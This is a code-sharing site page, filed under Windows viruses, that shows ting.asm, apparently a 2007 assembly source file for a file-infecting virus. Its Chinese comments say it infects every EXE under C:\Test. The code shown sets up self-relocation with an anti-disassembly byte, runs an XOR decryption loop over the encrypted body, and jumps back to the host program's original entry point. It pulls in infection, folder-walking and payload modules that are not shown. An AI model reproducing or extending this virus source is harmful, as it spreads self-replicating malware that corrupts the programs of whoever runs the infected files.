⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站
📤 上传资源

📄 ting.asm

📁 windows virus
💻 ASM
字号:
🔍 
;###########################################################################
;#			作者:Infox					   #
;###########################################################################
;#			日期:2007年5月10日				   #
;###########################################################################
;#	病毒感染 C:\Test 文件夹及子文件侠下的所有EXE文件		   #
;###########################################################################
		.386
		.MODEL		FLAT , STDCALL
		OPTION		CASEMAP : NONE
			
		INCLUDE		windows.inc
			
		.CODE
;###########################################################################
;#			病毒代码起始部分				   #
;###########################################################################
	V_CODE_START	EQU	THIS	BYTE
;###########################################################################
;#		    引入所有要使用的数据或函数定义			   #
;###########################################################################
		; 所有相关数据的定义
		INCLUDE		_AllDataDefine.inc
		; 结构化异常处理(SEH) 函数
		INCLUDE		_SEHHandler.inc
		; 得到 kernel32.dll 中API的辅助函数
		INCLUDE		_GetKernelApi.inc
		; 感染指定文件的辅助函数
		INCLUDE		_InfectFile.inc
		; 感染指定文件夹的辅助函数
		INCLUDE		_InfectFolder.inc
;###########################################################################
;#		   病毒中核心部分,已经被加密				   #
;###########################################################################	
	V_Body:
		; 得到 kernel32.dll 内在位置,即句柄,为查询API作准备!
		INCLUDE		_GetKernel.inc
		; 加载程序要使用的所有API函数
		INCLUDE		_GetAllApi.inc
		; 调用病毒感染模块
		INCLUDE 	_InfectCore.inc
		; 调用病毒表达模块
		INCLUDE		_Behavior.inc
		; 以下跳转入口 , 为病毒感染后跳转到原程序入口指令
	V_End:
			DB		0E9H	; 长跳转JMP
	V_Encrypt_End:
	G_JmpPosition:
			DD		0
			RET
;###########################################################################
;#				病毒真正入口				   #
;###########################################################################
	V_Start:
		; 病毒自身重定位,后面的程序都基于此重定位,重定位偏移存入 EBX
			STC
			JC		@F
			DB		0E8H
	@@:		CALL		@F
	@@:		POP		EBX
			SUB		EBX , OFFSET @B
		; 解密必需数据
			LEA		EDI , [EBX + V_CODE_START]
			MOV		EAX , [EBX + G_JmpPosition]
			MOV		ECX , OFFSET V_Encrypt_End \
					      - OFFSET V_CODE_START
			SHR		EAX , 3
		@DeEncrypt:
			XOR		[EDI] , AL
			INC		EDI
			LOOPNZ		@DeEncrypt
			LEA		EAX , [EBX + V_Body]
			JMP		EAX
;###########################################################################
;#				病毒代码结束部分			   #
;###########################################################################
	V_CODE_END	EQU		THIS	BYTE
			END		V_Start

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -